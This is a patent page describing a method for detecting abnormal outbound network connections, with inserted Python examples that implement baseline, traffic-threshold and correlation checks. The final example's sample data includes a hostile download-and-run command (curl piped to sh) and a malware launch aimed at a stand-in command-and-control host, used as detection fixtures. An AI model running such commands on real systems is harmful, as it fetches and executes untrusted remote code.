CN111193633B - Method and device for detecting abnormal network connection - Google Patents


Info

Publication number
CN111193633B
Authority
CN
China
Prior art keywords
information
abnormal
network
connection
host
Prior art date
Legal status
Active
Application number
CN201910800731.7A
Other languages
Chinese (zh)
Other versions
CN111193633A (en)
Inventor
郭晶
郑兴
范宇河
唐文韬
申军利
甘祥
Current Assignee
Tencent Technology Shenzhen Co Ltd
Original Assignee
Tencent Technology Shenzhen Co Ltd
Priority date
Filing date
Publication date
Application filed by Tencent Technology Shenzhen Co Ltd
Priority to CN201910800731.7A
Publication of CN111193633A
Application granted
Publication of CN111193633B
Legal status: Active (current)
Anticipated expiration

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 43/00 Arrangements for monitoring or testing data switching networks
    • H04L 43/08 Monitoring or testing based on specific metrics, e.g. QoS, energy consumption or environmental parameters
    • H04L 43/0805 Monitoring or testing based on specific metrics by checking availability
    • H04L 43/0811 Monitoring or testing based on specific metrics by checking availability by checking connectivity
    • H04L 43/0876 Network utilisation, e.g. volume of load or congestion level
    • H04L 43/0894 Packet rate
    • H04L 43/16 Threshold monitoring
    • H04L 63/00 Network architectures or network communication protocols for network security
    • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L 63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L 63/1425 Traffic logging, e.g. anomaly detection

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Environmental & Geological Engineering (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The embodiment of the invention discloses a method and a device for detecting abnormal network connection. Wherein the method comprises the following steps: when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal. The embodiment of the invention can improve the accuracy of the abnormal network connection detection.

Description

Method and device for detecting abnormal network connection
Technical Field
The invention relates to the technical field of communication, in particular to a method and a device for detecting abnormal network connection.
Background
In known intrusion incidents, especially data theft, attackers usually route their traffic through various protocol tunnels to conceal their tracks, but they can never avoid establishing network connections. Existing security defenses therefore rely on a host agent of the security facility to capture each network connection, after which a back-end policy decides whether the connection is abnormal by checking whether the connection IP is a blacklisted IP, whether the IP is frequently connected externally, whether data is actually exchanged, whether the target IP returns unrecognizable content or content with known malicious characteristics, and so on.
However, this kind of judgment cannot tell whether the network connection is actually carrying data outbound, so it cannot accurately determine whether the connection is abnormal, and the resulting anomaly is poorly interpretable.
Disclosure of Invention
The application provides a method and a device for detecting abnormal network connection, which can improve the accuracy of detecting the abnormal network connection.
In a first aspect, the present application provides a method for detecting an abnormal network connection, where the method includes:
when a host computer adds network connection, acquiring connection information of the added network connection; the connection information comprises network information and process information of a newly added process;
detecting whether the network information and the process information are both abnormal or not;
and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
In some embodiments of the present invention, when a host adds a network connection, acquiring connection information of the newly added network connection specifically includes:
detecting the network connections of the host at regular intervals;
and acquiring connection information of the newly added network connection of the host in a preset period.
In some embodiments of the invention, the network information comprises multidimensional network data;
the detecting whether the network information and the process information are both abnormal specifically includes:
detecting whether the process information is abnormal or not;
if yes, respectively detecting whether each dimension network data in the multi-dimension network data is abnormal;
and if at least one dimension of the network data is abnormal, judging that the network information is abnormal.
In some embodiments of the present invention, the process information includes the number of access IPs and the number of access days of the newly added process;
the detecting whether the process information is abnormal specifically includes:
comparing the number of the access IPs with a preset number of the IPs, and comparing the number of the access days with a preset number of the days;
and if the number of the access IPs is less than the preset number of the IPs and the number of the access days is less than the preset number of the days, judging that the process information is abnormal.
In some embodiments of the present invention, one dimension of the network data in the network information is the host traffic size;
the respectively detecting whether each dimension of the multi-dimensional network data is abnormal specifically includes:
comparing the host traffic with a preset traffic value;
and if the host traffic is larger than the preset traffic value, judging that the host traffic is abnormal.
In some embodiments of the present invention, the preset traffic value is the sum of the mean host traffic of a target period and three times the standard deviation of the host traffic in that period, where the target period is the period preceding the acquisition period of the connection information.
In some embodiments of the invention, the multi-dimensional network data further comprises a source IP, a destination IP, a source port, and a destination port.
In some embodiments of the invention, the method further comprises:
and when the newly added network connection is abnormal, displaying the associated network information and process information.
In some embodiments of the present invention, the process information further includes a parent process parameter, a parent process parameter, a process context, and process command data within a preset time period.
In a second aspect, the present application provides an apparatus for detecting an abnormal network connection, the apparatus comprising:
the information acquisition module is used for acquiring the connection information of the newly added network connection when the host computer newly adds the network connection; the connection information comprises network information and process information of a newly added process;
the information anomaly detection module is used for detecting whether the network information and the process information are both abnormal; and
the connection anomaly detection module is used for associating the network information with the process information when both are abnormal, so as to detect whether the newly added network connection is abnormal.
According to the embodiments of the application, when a host has a newly added network connection, the connection information of that connection is obtained; when both the network information in the connection information and the process information of the newly added process are abnormal, the two are associated to detect whether the newly added network connection is abnormal. This truly reflects whether the newly added process produces malicious outbound traffic, and because the anomaly detection associates multidimensional data, traceability is improved, the accuracy of abnormal network connection detection is improved, and the anomaly is interpretable.
Drawings
In order to more clearly illustrate the technical solutions in the embodiments of the present invention, the drawings required to be used in the description of the embodiments are briefly introduced below, and it is obvious that the drawings in the description below are only some embodiments of the present invention, and it is obvious for those skilled in the art that other drawings can be obtained based on these drawings without creative efforts.
Fig. 1 is a schematic view of a scenario of a system for detecting abnormal network connection according to an embodiment of the present invention;
Fig. 2 is a flowchart illustrating an embodiment of a method for detecting an abnormal network connection according to an embodiment of the present invention;
Fig. 3 is a schematic flowchart of a method for detecting an abnormal network connection according to another embodiment of the present invention;
Fig. 4 is a schematic structural diagram of an embodiment of a device for detecting an abnormal network connection provided in the embodiment of the present invention;
Fig. 5 is a schematic structural diagram of a server according to an embodiment of the present invention.
Detailed Description
The technical solutions in the embodiments of the present invention will be clearly and completely described below with reference to the drawings in the embodiments of the present invention, and it is obvious that the described embodiments are only a part of the embodiments of the present invention, and not all of the embodiments. All other embodiments, which can be obtained by a person skilled in the art without inventive step based on the embodiments of the present invention, are within the scope of protection of the present invention.
In the description that follows, specific embodiments of the present invention are described with reference to steps and symbols executed by one or more computers, unless otherwise indicated. Accordingly, these steps and operations will be referred to, several times, as being performed by a computer, the computer performing operations involving a processing unit of the computer in electronic signals representing data in a structured form. This operation transforms the data or maintains it at locations in the computer's memory system, which may be reconfigured or otherwise altered in a manner well known to those skilled in the art. The data maintains a data structure that is a physical location of the memory that has particular characteristics defined by the data format. However, while the principles of the invention have been described in language specific to above, it is not intended to be limited to the specific form set forth herein, but on the contrary, it is to be understood that various steps and operations described hereinafter may be implemented in hardware.
The term "module" or "unit" as used herein can be viewed as a software object executing on the computing system. The various components, modules, engines, and services described herein may be viewed as objects implemented on the computing system. The apparatus and method described herein are preferably implemented in software, but may also be implemented in hardware, and are within the scope of the present invention.
As used herein, the singular forms "a", "an" and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise. It will be further understood that the terms "comprises" and/or "comprising," when used in this specification, specify the presence of stated features, integers, steps, operations, elements, and/or components, but do not preclude the presence or addition of one or more other features, integers, steps, operations, elements, components, and/or groups thereof. It will be understood that when an element is referred to as being "connected" or "coupled" to another element, it can be directly connected or coupled to the other element or intervening elements may also be present. Further, "connected" or "coupled" as used herein may include wirelessly connected or wirelessly coupled. As used herein, the term "and/or" includes all or any element and all combinations of one or more of the associated listed items.
The embodiment of the invention provides a method and a device for detecting abnormal network connection.
Referring to fig. 1, fig. 1 is a schematic view of a scenario of a system for detecting an abnormal network connection according to an embodiment of the present invention, where the system for detecting an abnormal network connection includes a host 100 and a server 200, the host 100 and the server 200 are connected via a network, and a device for detecting an abnormal network connection is integrated in the server 200. In the embodiment of the present invention, the server 200 is mainly used for acquiring connection information of a newly added network connection when the host computer newly adds the network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information, and detecting whether the newly added network connection is abnormal.
In this embodiment of the present invention, the server 200 may be an independent server, or a server network or server cluster composed of multiple servers; for example, the server 200 described in this embodiment includes, but is not limited to, a computer, a network host, a single network server, a set of multiple network servers, or a cloud server composed of multiple servers. A cloud server is formed by a large number of computers or web servers based on cloud computing. In the embodiment of the present invention, the server and the terminal may communicate through any communication manner, including but not limited to mobile communication based on the third Generation Partnership Project (3GPP), Long Term Evolution (LTE) or Worldwide Interoperability for Microwave Access (WiMAX), or computer network communication based on the TCP/IP protocol suite, the User Datagram Protocol (UDP), and the like.
It is to be understood that the host 100 used in the embodiment of the present invention may be understood as a terminal, which includes a device of receiving and transmitting hardware, i.e., a device having receiving and transmitting hardware capable of performing bidirectional communication over a bidirectional communication link. Such a terminal may include: a cellular or other communication device having a single line display or a multi-line display or a cellular or other communication device without a multi-line display. The host 100 may be a desktop terminal or a mobile terminal, and the host 100 may be one of a mobile phone, a tablet computer, a notebook computer, and the like.
Those skilled in the art will appreciate that the application environment shown in fig. 1 is only one application scenario related to the present invention, and does not constitute a limitation to the application scenario of the present invention, and that other application environments may further include more or less servers than those shown in fig. 1, or a server network connection relationship, for example, only 1 server and 1 host are shown in fig. 1, and it is understood that the system for detecting an abnormal network connection may further include one or more other servers, or/and one or more hosts connected to a server network, and is not limited herein.
In addition, as shown in fig. 1, the system for detecting an abnormal network connection may further include a memory 300, configured to store data, such as a connection information database, where connection information of a network connection of the host 100 is stored in the connection information database, and the connection information may exist in the form of a file, for example, the file may include a plurality of data, such as an application template, file data (e.g., files in various formats, such as Word file, Excel file, or PPT file), and picture data (e.g., pictures in various formats, such as jpg, png, bmp), and the like, and correspondingly, the connection information database may also be divided into a plurality of types of data, such as an application database, a file database, a picture database, and the like.
It should be noted that the scenario diagram of the detection system for abnormal network connection shown in fig. 1 is only an example, and the detection system for abnormal network connection and the scenario described in the embodiment of the present invention are for more clearly illustrating the technical solution of the embodiment of the present invention, and do not form a limitation on the technical solution provided in the embodiment of the present invention.
The following is a detailed description of specific embodiments.
In the present embodiment, description will be made from the viewpoint of a detection device of an abnormal network connection, which may be specifically integrated in the server 200.
The invention provides a method for detecting abnormal network connection, which comprises the following steps: when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
Referring to fig. 2, a schematic flow chart of an embodiment of a method for detecting an abnormal network connection according to an embodiment of the present invention is shown, where the method for detecting an abnormal network connection includes:
201. when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information includes network information and process information of the newly added process.
In the embodiment of the invention, the newly added network connection refers to the newly added network connection of the host. The host may actively initiate multiple requests to the internet to establish multiple network connections. The network connection of the host computer is cached in the cache pool, and whether the current network connection of the host computer has the newly added network connection or not can be judged through the network connection in the cache pool.
The connection information of the newly added network connection may include all information relevant to the connection, such as the network information and the process information of the newly added process. The network information includes the network connection five-tuple, the host traffic, and so on; the five-tuple consists of the source IP, destination IP, source port, destination port and protocol number. The process information of the newly added process includes the process name, process ID, parent process parameter, parent process parameter, process chain, process context, process command data, the number of IPs the process has accessed, the number of days on which it was active, and so on. The connection information of the newly added connection may be the connection information within a fixed time period.
Specifically, when the host adds a network connection, acquiring connection information of the newly added network connection specifically includes: regularly detecting the network connection of the host; and acquiring connection information of the newly added network connection of the host in a preset period.
The host network connections are detected with a command similar to netstat -pat or ss -stup. The host's network connections are checked at regular intervals and the connection information of each connection is collected; if a new network connection has appeared, its connection information is reported to the back end for storage. The back end maintains a connection information database, for example a Hadoop database, in which the connection information of the newly added network connection is stored. The connection information of newly added network connections within a fixed time period, such as a preset period, is then extracted from the connection information database for subsequent information anomaly detection.
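As an added illustration (not code from the patent), the following Python parses a constructed `ss -tunp`-style snapshot into five-tuple plus process records and diffs it against the cached connection pool to find newly added connections; the column layout, sample lines and function names are assumptions.

```python
import re
from dataclasses import dataclass

# Regex for the process column that `ss -p` prints, e.g. users:(("curl",pid=4321,fd=3))
PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


@dataclass(frozen=True)
class Connection:
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    state: str
    process: str   # process name, "" when ss could not resolve it
    pid: int       # 0 when unknown

    @property
    def five_tuple(self):
        # The page's five-tuple: protocol, source IP, source port, destination IP, destination port
        return (self.proto, self.src_ip, self.src_port, self.dst_ip, self.dst_port)


def split_endpoint(endpoint):
    """Split 'addr:port' into (addr, port); handles bracketed IPv6 such as [::1]:22."""
    addr, _, port = endpoint.rpartition(":")
    return addr.strip("[]"), (int(port) if port.isdigit() else 0)


def parse_snapshot(text):
    """Parse `ss -tunp`-style output (assumed column order) into Connection records."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] == "Netid":   # skip blank lines and the header
            continue
        proto, state, local, peer = parts[0], parts[1], parts[4], parts[5]
        src_ip, src_port = split_endpoint(local)
        dst_ip, dst_port = split_endpoint(peer)
        m = PROC_RE.search(line)
        name, pid = (m.group(1), int(m.group(2))) if m else ("", 0)
        conns.append(Connection(proto, src_ip, src_port, dst_ip, dst_port, state, name, pid))
    return conns


def detect_new_connections(cache_pool, snapshot_text):
    """Return (newly added connections, updated cache pool).

    cache_pool is the set of five-tuples already seen for this host; a connection whose
    five-tuple is not in the pool is treated as newly added, as the page describes.
    Eviction of closed connections from the pool is left out for brevity.
    """
    conns = parse_snapshot(snapshot_text)
    new = [c for c in conns if c.five_tuple not in cache_pool]
    return new, cache_pool | {c.five_tuple for c in conns}


# Constructed sample snapshots (not captured from a real host): two polls of the same host.
SNAPSHOT_T1 = """\
Netid State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
tcp   ESTAB  0      0      10.0.0.5:51234       203.0.113.7:443    users:(("curl",pid=4321,fd=3))
udp   ESTAB  0      0      10.0.0.5:41000       10.0.0.1:53        users:(("systemd-resolve",pid=611,fd=12))
"""
SNAPSHOT_T2 = """\
Netid State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
tcp   ESTAB  0      0      10.0.0.5:51234       203.0.113.7:443    users:(("curl",pid=4321,fd=3))
tcp   ESTAB  0      0      10.0.0.5:52001       198.51.100.9:8443  users:(("updater",pid=7788,fd=5))
udp   ESTAB  0      0      10.0.0.5:41000       10.0.0.1:53        users:(("systemd-resolve",pid=611,fd=12))
"""

if __name__ == "__main__":
    pool = set()
    _, pool = detect_new_connections(pool, SNAPSHOT_T1)      # first poll fills the pool
    added, pool = detect_new_connections(pool, SNAPSHOT_T2)  # second poll reports only new ones
    for c in added:
        print(c.five_tuple, c.process, c.pid)   # this is what the agent would report to the back end
```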
According to the embodiment of the invention, the network connection relation of the host is detected, the abnormal process of stealing data by a hacker is found, the detection rate of key data leakage in the hacking event is greatly increased, and the accuracy of subsequent network abnormality detection is further improved.
202. And detecting whether the network information and the process information are abnormal or not.
In the embodiment of the invention, the anomaly detection of the process information may be process baseline detection, that is, checking whether the process information conforms to the process baseline, so as to judge whether the newly added process is a common process. The network information comprises multi-dimensional network data, and the network information is judged abnormal if any one dimension of the network data is abnormal.
Specifically, the detecting whether both the network information and the process information are abnormal specifically includes: detecting whether the process information is abnormal or not; if yes, respectively detecting whether each dimension network data in the multi-dimension network data is abnormal; and if the at least one dimension of network data is abnormal, judging that the network information is abnormal.
The process baseline detection is to detect the number of the access IP and the number of the access days of the newly added process in the process information.
Specifically, the detecting whether the process information is abnormal specifically includes: comparing the number of the access IPs with a preset number of the IPs, and comparing the number of the access days with a preset number of days; and if the number of the access IPs is less than the preset number of the IPs and the number of the access days is less than the preset number of the days, judging that the process information is abnormal.
It should be noted that the preset IP number and the preset number of days are scalar values set by counting the number of accessed IPs and the number of access days of common processes. Comparing the number of accessed IPs and the number of access days of the newly added process with the corresponding scalars determines whether the process information of the newly added process is abnormal, that is, whether the newly added process is a common process. Abnormal process information alone, however, is not sufficient to indicate that the newly added network connection is abnormal; the network information must be judged as well.
The network information includes multidimensional network data such as the traffic size, source IP, destination IP, source port number, destination port number and protocol number. Each dimension of the multidimensional network data in the network information is detected separately, and the network information is judged abnormal when any dimension is abnormal.
For example, detecting the host traffic size dimension of the network information includes: comparing the host traffic with a preset traffic value; and if the host traffic is larger than the preset traffic value, judging that the host traffic is abnormal.
The preset traffic value is a preset traffic threshold that can be obtained from statistics of normal host traffic. If the host traffic in the network information is larger than the preset traffic value, the host traffic is judged abnormal and therefore the network information is judged abnormal; if the host traffic is smaller than or equal to the preset traffic value, the host traffic is judged normal and the other dimensions of the network data can continue to be checked.
Since the standard deviation $\sigma$ from probability and statistics is often used to detect anomalous samples, assume a set of $n$ sample values $X_1, \dots, X_n$ (denoted $X_i$). The arithmetic mean is
$$\mu = \frac{X_1 + \dots + X_n}{n},$$
and the standard deviation (shown as an image in the original) is the root of the mean squared deviation from $\mu$:
$$\sigma = \sqrt{\frac{1}{n}\sum_{i=1}^{n}(X_i - \mu)^2}.$$
For any normal distribution, the probability of a value falling in the interval $(\mu - k\sigma,\ \mu + k\sigma)$ around the mean is:
when $k = 1$, $\Pr(\mu - \sigma \le x \le \mu + \sigma) \approx 0.6827$; when $k = 2$, $\Pr(\mu - 2\sigma \le x \le \mu + 2\sigma) \approx 0.9545$; when $k = 3$, $\Pr(\mu - 3\sigma \le x \le \mu + 3\sigma) \approx 0.9973$. It can be seen that 99.73% of the data in a normal distribution lie within three standard deviations of the mean, and if the distance from a sample value to the mean exceeds this range, the sample value is considered abnormal.
Therefore, the preset traffic value may be set to $\mu + 3\sigma$, where $\mu$ is the mean host traffic of the target period and $\sigma$ is the standard deviation of the host traffic of the target period, the target period being the period preceding the acquisition period of the connection information.
In addition, for the other dimensions of the network data in the network information, such as the source IP, destination IP, source port and destination port, abnormality can be detected by a similarity comparison method, which completes the detection of whether the network information is abnormal.
203. And if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
In the embodiment of the invention, when both the network information and the process information are detected to be abnormal, the multidimensional data such as the network information and the process information are associated and output together, and whether the newly added network connection is abnormal is further judged from the output data; this further judgment may be made manually. When the newly added network connection is abnormal, an anomaly alarm is raised for it.
The embodiment of the invention is not limited by the platform environment but depends on the richness of the data. The association of the multidimensional data relies on a time window, which may be set to 5 minutes before and after the time point. Associating the multidimensional data makes alarm tracing simpler, clearer and more concise, truly reflects whether the newly added process produces malicious outbound traffic, and improves the accuracy of abnormal network connection detection.
Further, the method further comprises: and when the connection of the newly added network is abnormal, displaying the associated network information and the process information.
In the embodiment of the invention, when the newly added network connection is abnormal, the abnormal network connection and the abnormal points are preferentially displayed, and then the process context, the process command data in the time window and the like are sequentially displayed.
To sum up, in the embodiment of the present invention, when a new network connection is added to a host, the connection information of the new connection is obtained, and when both the network information in the connection information and the process information of the new process are abnormal, the network information and the process information are associated to detect whether the new network connection is abnormal. This truly reflects whether malicious outbound traffic exists in the new process; at the same time, because the anomaly detection associates multidimensional data, traceability is increased, the accuracy of abnormal network connection detection is improved, and the anomaly is interpretable.
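The detection logic of steps 202 and 203, as an added example rather than code from the patent: a process-baseline check on accessed-IP and access-day counts, a traffic check against $\mu + 3\sigma$ of the previous period, and association of the two with process command events inside the 5-minute window. The preset thresholds, record layouts, sample traffic series and command events are assumptions constructed for the example.

```python
import statistics
from dataclasses import dataclass
from datetime import datetime, timedelta

# Added example (not the patent's own code): process baseline + mu + 3*sigma traffic check,
# then association within a +/-5 minute window. Thresholds below are assumed values.

PRESET_IP_COUNT = 3            # assumed "preset number of IPs"
PRESET_DAYS = 3                # assumed "preset number of days"
WINDOW = timedelta(minutes=5)  # page: 5 minutes before and after the time point


@dataclass(frozen=True)
class ProcessInfo:
    name: str
    pid: int
    access_ip_count: int   # distinct IPs the process connected to in the period
    access_days: int       # distinct days on which the process made connections
    command: str = ""


@dataclass(frozen=True)
class NetworkInfo:
    src_ip: str
    dst_ip: str
    src_port: int
    dst_port: int
    protocol: str
    host_traffic: float    # host traffic size in the acquisition period (bytes)
    seen_at: datetime      # time point of the newly added connection


def process_abnormal(proc, preset_ips=PRESET_IP_COUNT, preset_days=PRESET_DAYS):
    """Process baseline: abnormal only when BOTH counts are below the presets."""
    return proc.access_ip_count < preset_ips and proc.access_days < preset_days


def traffic_threshold(previous_period):
    """Preset traffic value mu + 3*sigma from the previous period's traffic samples."""
    mu = statistics.fmean(previous_period)
    sigma = statistics.pstdev(previous_period)  # population sigma, matching the page's definition
    return mu + 3 * sigma


def abnormal_network_dimensions(net, threshold):
    """Names of abnormal network dimensions. Only host traffic is scored here; the page
    leaves the IP/port similarity comparison unspecified, so it is not implemented."""
    return ["host_traffic"] if net.host_traffic > threshold else []


def associate(net, proc, dims, threshold, process_events):
    """Associate network and process information; keep only command events in the window."""
    in_window = [(ts, cmd) for ts, cmd in process_events if abs(ts - net.seen_at) <= WINDOW]
    return {
        "five_tuple": (net.src_ip, net.dst_ip, net.src_port, net.dst_port, net.protocol),
        "process": (proc.name, proc.pid, proc.command),
        "abnormal_dimensions": dims,
        "traffic_threshold": threshold,
        "host_traffic": net.host_traffic,
        "process_commands_in_window": in_window,
    }


def detect_abnormal_connection(net, proc, previous_period, process_events=()):
    """Steps 202/203: return an associated record only when both sides are abnormal."""
    if not process_abnormal(proc):
        return None
    threshold = traffic_threshold(previous_period)
    dims = abnormal_network_dimensions(net, threshold)
    if not dims:
        return None
    return associate(net, proc, dims, threshold, process_events)


# Constructed sample data (not taken from any real host).
PREVIOUS_PERIOD_TRAFFIC = [1200, 1350, 1100, 1420, 1300, 1250, 1380, 1150]  # per-interval bytes
T0 = datetime(2019, 8, 27, 10, 0, 0)
SAMPLE_NET = NetworkInfo("10.0.0.5", "198.51.100.9", 52001, 8443, "tcp", 4800.0, T0)
SAMPLE_PROC = ProcessInfo("updater", 7788, access_ip_count=1, access_days=1,
                          command="/tmp/updater --sync")
SAMPLE_EVENTS = [
    (T0 - timedelta(minutes=2), "/tmp/updater --sync"),
    (T0 + timedelta(minutes=1), "/tmp/updater --upload"),
    (T0 + timedelta(minutes=30), "logrotate /etc/logrotate.conf"),  # outside the window
]

if __name__ == "__main__":
    print(detect_abnormal_connection(SAMPLE_NET, SAMPLE_PROC, PREVIOUS_PERIOD_TRAFFIC, SAMPLE_EVENTS))
```

The returned record is what step 203 would output together for the manual judgment and display described above; a `None` result means one of the two sides was normal and no alarm is raised.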
The following describes a method for detecting abnormal network connection in the embodiment of the present invention with reference to a specific application scenario.
Please refer to fig. 3, which is a flowchart of a method for detecting an abnormal network connection according to another embodiment of the present invention. The method is applied to a server and comprises:
301. Collecting data on newly added network connections for each host in the IDC machine room, and storing the collected data.
Here, an IDC (Internet Data Center) provides a machine room environment, Internet communication lines and bandwidth resources, server hosting or leasing, and related value-added services. The IP addresses of the IDC machine room are the IDC addresses, and the common ports are the services and ports commonly used for operation and maintenance management, databases and file transfer, such as SSH/22, Telnet/23, MySQL/3306, MongoDB/27017, Memcached/11211, Redis/6379, Rsync/873, FTP/21 and the like.
Each host actively initiates requests to the Internet and thereby establishes network connections. For each host's newly added network connections, the relevant data are collected, such as traffic size, source IP, destination IP, source port, destination port, process information and the like, and the collected data are stored on a Spark or Hadoop big data computing platform.
302. Based on the collected data, performing a baseline calculation for each host on the Spark or Hadoop big data computing platform.
Data within a preset period are read from the stored data, and the subsequent anomaly detection is based on these data. The baseline calculation counts, for the newly added process of each host, the number of distinct accessed IPs and the number of days on which accesses occurred; if both counts for the newly added process of a host are smaller than their preset thresholds, the baseline calculation for that host is judged abnormal.
303. When the baseline calculation of a host is abnormal, separately detecting whether the IP, the port and the traffic of the host are abnormal.
Anomaly detection of the IP and the port can be implemented by comparing similarity, and anomaly detection of the traffic by comparing the traffic with a traffic threshold. The traffic threshold is preferably the mean of the traffic in the previous period plus three times its standard deviation, where the previous period is the period immediately before the collection period of the collected data.
304. If any of the IP, the port and the traffic is abnormal, displaying the correlated multidimensional data so as to detect whether the newly added network connection of the host is abnormal.
The multidimensional data comprise traffic size, source IP, destination IP, source port, destination port, process information and the like, and the process information comprises parent process parameters, process context, process command data and the like. The emergency response team can judge whether the newly added network connection is abnormal from the correlated multidimensional data, which improves the accuracy of detecting abnormal newly added network connections.
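Steps 301 to 304 above, carried through as an added worked example in Python; this is editor-written illustration, not code from the patent or from Tencent. The patent leaves the preset IP-count and day-count limits, the similarity measure for IPs and ports, and the data layout unspecified, so the values used here (limits of 3 IPs and 2 days, a shared-leading-octet similarity for IPs, "seen before or a common ops port" for ports, a ±5 minute window) and every record in `PREV_PERIOD`, `NEW_CONNECTIONS` and `PROCESS_EVENTS` are constructed assumptions; in the described system these would be read from the Spark or Hadoop store.

```python
"""Added worked example (not the patent's own code): outbound-connection anomaly
detection following steps 301-304.  All thresholds and records are assumptions."""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev

PRESET_IP_COUNT = 3      # assumed: fewer distinct destination IPs than this ...
PRESET_DAY_COUNT = 2     # ... and fewer active days than this -> process abnormal
WINDOW_SECONDS = 5 * 60  # +/- 5 minutes around the connection, as in the text
COMMON_OPS_PORTS = {22, 23, 3306, 27017, 11211, 6379, 873, 21}  # listed in step 301

# Constructed previous-period data for host "h1": per-interval outbound bytes
# and the destination IPs/ports seen (in production: the Spark/Hadoop store).
PREV_PERIOD = {"h1": {
    "traffic": [1200, 1350, 1100, 1280, 1220, 1400, 1150, 1300],
    "dst_ips": {"10.0.1.5", "10.0.1.9", "10.0.2.20"},
    "dst_ports": {3306, 6379}}}

# Constructed newly added connections in the current period (epoch seconds, UTC).
NEW_CONNECTIONS = [
    {"host": "h1", "pid": 4242, "process": "/tmp/.x/agent", "ts": 1724840400,
     "src_ip": "10.0.0.7", "src_port": 51234, "dst_ip": "203.0.113.66",
     "dst_port": 4444, "bytes": 9800},
    {"host": "h1", "pid": 1001, "process": "/usr/sbin/mysqld", "ts": 1724840500,
     "src_ip": "10.0.0.7", "src_port": 40001, "dst_ip": "10.0.1.5",
     "dst_port": 3306, "bytes": 1250}]

# Constructed process-command events recorded by the host agent for pid 4242.
def _ev(ts, cmd):
    return {"host": "h1", "pid": 4242, "ts": ts, "ppid": 3990, "parent": "/bin/bash", "cmd": cmd}
PROCESS_EVENTS = [_ev(1724840280, "curl -s http://203.0.113.66/a.sh | sh"),
                  _ev(1724840395, "/tmp/.x/agent -c 203.0.113.66:4444"),
                  _ev(1724841900, "/tmp/.x/agent --update")]  # outside the window

def traffic_threshold(samples):
    """Step 303: mean of the previous period plus three standard deviations."""
    return mean(samples) + 3 * pstdev(samples)

def baseline_abnormal(conns, ip_limit=PRESET_IP_COUNT, day_limit=PRESET_DAY_COUNT):
    """Step 302: per (host, process) count distinct destination IPs and active days;
    return the pairs whose counts are both below the preset limits."""
    ips, days = defaultdict(set), defaultdict(set)
    for c in conns:
        key = (c["host"], c["process"])
        ips[key].add(c["dst_ip"])
        days[key].add(datetime.fromtimestamp(c["ts"], timezone.utc).date())
    return {k for k in ips if len(ips[k]) < ip_limit and len(days[k]) < day_limit}

def ip_similarity(ip, history):
    """Assumed similarity measure (the patent only says "compare similarity"):
    longest run of leading octets shared with any historical IP, scaled to [0, 1]."""
    best = 0
    for h in history:
        n = 0
        for a, b in zip(ip.split("."), h.split(".")):
            if a != b:
                break
            n += 1
        best = max(best, n)
    return best / 4

def network_anomalies(conn, prev):
    """Step 303: test traffic, destination IP and destination port separately and
    return the abnormal dimensions (empty list = network information normal).
    Source IP/port would be checked the same way against the host's own history."""
    found = []
    if conn["bytes"] > traffic_threshold(prev["traffic"]):
        found.append("traffic")
    if ip_similarity(conn["dst_ip"], prev["dst_ips"]) < 0.5:  # assumed cut-off: no shared /16
        found.append("dst_ip")
    if conn["dst_port"] not in prev["dst_ports"] | COMMON_OPS_PORTS:
        found.append("dst_port")
    return found

def correlate(conn, events, window=WINDOW_SECONDS):
    """Step 304 with the 5-minute window: attach the process context and the
    command events of the same host and pid within +/- window seconds."""
    hits = sorted((e for e in events if e["host"] == conn["host"]
                   and e["pid"] == conn["pid"] and abs(e["ts"] - conn["ts"]) <= window),
                  key=lambda e: e["ts"])
    context = {"pid": conn["pid"], "process": conn["process"]}
    if hits:
        context.update(ppid=hits[0]["ppid"], parent=hits[0]["parent"])
    return {"connection": {k: conn[k] for k in ("src_ip", "src_port", "dst_ip", "dst_port", "bytes")},
            "process_context": context, "commands": [e["cmd"] for e in hits]}

def detect(conns, events, prev_period):
    """Whole pipeline.  Alert fields follow the display order in the text: the
    connection and its anomaly points first, then process context, then commands."""
    flagged = baseline_abnormal(conns)
    alerts = []
    for c in conns:
        if (c["host"], c["process"]) not in flagged:
            continue  # process information normal: stop here
        dims = network_anomalies(c, prev_period[c["host"]])
        if not dims:
            continue  # network information normal: a baseline hit alone is no alert
        alert = {"host": c["host"], "anomaly_points": dims}
        alert.update(correlate(c, events))
        alerts.append(alert)
    return alerts

if __name__ == "__main__":
    for alert in detect(NEW_CONNECTIONS, PROCESS_EVENTS, PREV_PERIOD):
        print(alert)
```

Running the block yields a single alert for `/tmp/.x/agent`: its traffic (9800 bytes) exceeds the previous period's mean plus three standard deviations (about 1534), the destination IP shares no prefix with the host's history, and port 4444 is neither historical nor a common ops port; the two command events inside the window (the `curl | sh` download and the launch with the C2 address) are attached, the later `--update` event is not. The `mysqld` connection is also baseline-abnormal (one IP, one day) but passes every network check and is suppressed, which is the false-positive reduction the multidimensional correlation is meant to deliver.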
